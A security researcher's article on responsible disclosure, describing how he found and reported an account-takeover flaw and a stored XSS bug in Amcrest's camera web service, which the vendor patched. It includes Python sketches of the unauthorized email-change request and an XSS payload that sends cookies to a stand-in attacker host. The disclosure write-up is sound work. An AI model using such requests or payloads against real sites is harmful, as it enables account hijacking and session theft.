A Real-Life Look into Responsible Disclosure for Security Vulnerabilities
A researcher gives us a glimpse into what happened when he found a problem with an IoT device.
As an information security researcher, a major part of my job is to help software and hardware manufacturers fix security issues before they're exploited by bad guys. When white hat hackers like me find a new zero-day vulnerability in devices or software, we report it directly to the vendor using a series of steps called "responsible disclosure."
I reviewed this process in an earlier post here on Dark Reading. Unfortunately, the disclosure process is sometimes criticized. Some accuse manufacturers of not fixing the problems with their devices, while others accuse researchers of releasing vulnerability information recklessly. But based on my personal experience reporting vulnerabilities, I strongly believe disclosure is beneficial for all parties involved.
To prove this point, I'd like to walk you through a recent research project I completed so you can see the steps we take to find and responsibly disclose a new vulnerability. Some quick background: I'm part of WatchGuard's Threat Lab, and we recently launched an ongoing research project that evaluates Internet of Things devices in response to the growing threats associated with the Mirai botnet. It's worth noting that the vendor highlighted in this example was exemplary in responding to our disclosure and worked to immediately patch the vulnerability.
The product I'll cover in this article is the Amcrest IPM-721S Wireless IP camera. This webcam lets users view its footage through Amcrest's website, called Amcrest View. The first thing I attempted was the obvious goal: viewing footage from a camera that was not associated with my account. Let's jump in.
I performed most of my investigation using Burp Suite's proxy. My attempts to retrieve connection information for a specific camera with an unauthenticated session failed, confirming that Amcrest verifies ownership of each camera's serial number by the authenticated user before providing connection details. No vulnerability here.
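To give a feel for what that probe looked like, here's a minimal sketch in Python. I did the real testing through Burp's proxy, and the endpoint path, parameter name, and serial number below are placeholders of mine, not Amcrest's actual API:

import requests

# Hypothetical endpoint and field names for illustration only; the
# real Amcrest View API uses different paths. The point is that no
# session cookie or token accompanies the request.
resp = requests.post(
    "https://view.example-amcrest.com/camera/connectionInfo",
    data={"serialNumber": "AMC0000TEST00000"},
    timeout=10,
)

# A server that checks ownership rejects this unauthenticated
# request, which is exactly what Amcrest View did in my testing.
print(resp.status_code)  # expect 401/403, not connection details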
If I couldn't view a camera that I didn't own, how about simply taking ownership of the account that owned the camera?
Amcrest View, like most Web applications, lets users modify account settings such as the associated email address. To change the email address associated with an account, the browser submits a POST request containing several parameters; the important ones are “user.userName” and “user.email.” A successful request tells Amcrest View to set the email address for the username in the user.userName parameter to the value of the user.email parameter. As it turned out, my request succeeded even when the user.userName parameter didn't match the username of the currently authenticated session. Houston, we have a problem.
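Sketched in Python, the problematic request looked roughly like this. The endpoint path is my placeholder, but user.userName and user.email are the actual parameter names:

import requests

session = requests.Session()
# Assume `session` already carries the cookies from MY authenticated
# login -- an ordinary, low-privilege account.

resp = session.post(
    "https://view.example-amcrest.com/user/modifyEmail",  # placeholder path
    data={
        "user.userName": "victim_account",     # someone else's username
        "user.email": "attacker@example.com",  # an address I control
    },
)

# The server should reject this because the session belongs to me,
# not to victim_account. Instead, it accepted the change and pointed
# the victim's account-recovery email at an address I control.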
If I had wanted to exploit this vulnerability, I could have modified the email address associated with any account and then issued a password reset to take over that account and obtain live access to its cameras (creepy, right?). While confirming the unauthorized account modification vulnerability, I also found that the input I passed in the user.email parameter was not validated or sanitized. In other words, the software did not check that the user.email value was, in fact, an email address. This could be exploited to inject arbitrary JavaScript into a victim's session, a perfect example of a stored cross-site scripting (XSS) vulnerability. Attackers use XSS vulnerabilities to siphon off authentication credentials and load malicious websites full of malware without the victim's knowledge.
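As a generic illustration (not the exact payload from my report), an attacker could abuse the unvalidated field like this:

import requests

session = requests.Session()  # as before, assume an authenticated session

# A generic stored XSS probe. Because user.email was never checked
# against an email format, a value like this is stored verbatim and
# later rendered in the victim's browser, which executes it and
# leaks the session cookie to the attacker's server.
payload = '"><script>location="https://attacker.example/?c="+document.cookie</script>'

resp = session.post(
    "https://view.example-amcrest.com/user/modifyEmail",  # same placeholder path
    data={"user.userName": "victim_account", "user.email": payload},
)

The fix has two parts: verify that the authenticated session owns the account named in user.userName, and reject any user.email value that doesn't parse as an email address.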
After discovering this vulnerability, I turned my notes, screenshots, and code samples into a vulnerability disclosure report, which you can read in full here. I submitted this report to Amcrest on November 4, 2016. Many large vendors have a process in place for reporting vulnerabilities, and if not, a researcher usually sends an email encrypted with the vendor's public PGP key. In this case, I contacted Amcrest's support team to inquire how they would like me to report the vulnerability. Ultimately, I submitted my vulnerability report through a support case.
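For readers who haven't used the encrypted-email route, here's a minimal sketch using the python-gnupg wrapper. It assumes GnuPG is installed and that the vendor publishes a PGP key on its security page; the file names are my own examples:

import gnupg

gpg = gnupg.GPG()

# Import the vendor's published public key (file name is an example).
with open("vendor_security_pubkey.asc") as f:
    vendor_key = gpg.import_keys(f.read())

# Encrypt the plaintext report so only the vendor's security team can
# read it. always_trust skips the local trust-model check for the
# freshly imported key.
with open("disclosure_report.txt") as f:
    encrypted = gpg.encrypt(
        f.read(),
        vendor_key.fingerprints[0],
        always_trust=True,
        armor=True,
    )
assert encrypted.ok, encrypted.status

# Paste or attach the ASCII-armored result in the disclosure email.
with open("disclosure_report.txt.asc", "w") as f:
    f.write(str(encrypted))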
Now for the important question: what is the appropriate amount of time to allow a vendor to respond before publicly disclosing a vulnerability? A researcher should give the vendor a reasonable window to investigate and patch the flaw, but there's no industry standard for how long that is. I opt for 60 days, which is common.
Once the vendor has issued a patch, or if the vendor has not responded in a reasonable amount of time, a researcher will usually release their vulnerability report to the public. This allows end users to protect themselves if the vendor can't or won't fix the problem (and the implied threat of public disclosure puts pressure on vendors to fix security issues quickly).
Fortunately, that was not an issue in this case. Amcrest got back to me in just four days to confirm my report. By early December, it had patched the vulnerabilities and issued a security notice that urged customers to update their camera's firmware. I published my security report, satisfied I had helped at least one company and its users become more secure. This was a win-win for all parties involved.
Contrary to what you might read in the news, most vulnerabilities reported to manufacturers turn out like this one. Both parties benefit: the vendor makes its products and customers more secure, and the researcher increases public awareness of vulnerabilities and builds a reputation by publishing the findings. It's not a perfect system, but I strongly believe it's beneficial for everyone involved.